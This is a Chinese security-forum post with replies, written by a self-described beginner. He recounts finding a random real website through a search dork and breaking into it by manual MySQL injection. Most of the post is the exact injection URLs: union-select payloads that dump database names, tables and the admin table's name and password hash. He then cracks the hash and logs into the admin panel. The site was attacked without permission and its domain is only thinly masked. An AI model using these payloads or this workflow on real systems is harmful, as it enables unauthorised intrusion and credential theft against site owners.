用户
搜索
  • TA的每日心情
    无聊
    5 天前
  • 签到天数: 33 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋-见习白帽

    Rank: 3Rank: 3

    1

    主题

    128

    帖子

    627

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2016-6-6
    发表于 2019-8-30 16:55:58 103532
             最近一直在学习mysql手工注入篇,也算是基础吧,于是乎就通过inurl:.php?id=方式挨个的踩点来实战下,运气还算是不错的,找到了一个站点。
    1567152262(1).jpg

    URL后面随手一个'页面错误,并且返回报错的sql语句。
    2.png
    接着' and ' 1 ' = ' 1 页面正常。
    3.jpg
    ' and ' 1 '= ' 2页面错误,判断该URL存在sql注入
    4.png
    接下来通过order by 语句来判断列数也就是字段数 得知列数为16列
    语句如下:http://xxoo.com/show.php?cid=25&classid=8&id=44' order by 16%23  页面返回正常  这里%23是#的URL编码起到注释作用
    5.png
    接着就是通过union select 联合查询语句查询页面回显位置来暴数据库,表名,字段名,数据等。
    语句如下:http://xxoo.com/show.php?cid=25&classid=8&id=-44' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23
    6.png
    通过页面返回得知在2,4,3位置可以返回我们所需要的数据。
    暴库语句:http://xxoo.com/show.php?cid=25&classid=8&id=-44' union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23
    7.png
    得到数据库:my4400038,
    继续暴my4400038数据库中表。
    暴表名语句:http://xxoo.com/show.php?cid=25&classid=8&id=-44' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='my4400038'),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23.
    8.png
    继续~~
    f_admin表中字段名。
    9.png
    接下里就是暴表中name和passwd数据
    10.png
    语句:http://xxoo.com/show.php?cid=25&classid=8&id=-441' union select 1,(select concat_ws('~~~~~~',name,passwd) from f_admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

    账号:admin
    最后md5解密:3211003

    11.png
    后台随手一个admin登陆之~~
                  本篇文件没什么技术含量,只要掌握了sql语句注入的流程,即可轻松拿下,本人小白,目前努力学习中









    发表于 2019-8-31 12:01:59
    这是审核过了还是没过啊,,为啥都没人给我点赞。。和评论呢。。。
    使用道具 举报 回复
    sexandy 发表于 2019-8-31 12:01
    这是审核过了还是没过啊,,为啥都没人给我点赞。。和评论呢。。。 ...

    因为看不懂
    使用道具 举报 回复
    哈哈哈哈,相互学习
    使用道具 举报 回复
    发表于 2019-9-3 18:06:28
    这个网站已经被挂bc了..
    使用道具 举报 回复
    发表于 2019-9-3 20:33:53
    打码没打好啊你应该在深入一下,一步一步写下来,注意打码,让小白能轻松看懂
    20190903203038711.jpg
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    发表于 2019-9-3 21:25:04
    zhangk64 发表于 2019-9-3 18:06
    这个网站已经被挂bc了..

    你怎么知道呢
    使用道具 举报 回复
    发表于 2019-9-3 21:25:21
    Sir 7 发表于 2019-9-3 20:33
    打码没打好啊你应该在深入一下,一步一步写下来,注意打码,让小白能轻松看懂
    ...

    谢谢啦。。
    使用道具 举报 回复
    发表于 2019-9-4 10:34:12

    你的截图中包含了网站关键词(打太多码的话就无法证明注入了。。),搜索一下就能找到域名,发现域名被挂bc了。。。
    使用道具 举报 回复
    发表于 2019-9-4 10:36:24
    你通过inurl就能找到注入,而且没waf,这种网站现在太难找了。。。。
    使用道具 举报 回复
    发表于 2019-9-5 01:02:48
    zhangk64 发表于 2019-9-4 10:36
    你通过inurl就能找到注入,而且没waf,这种网站现在太难找了。。。。

    也是运气好,随便找的一个
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册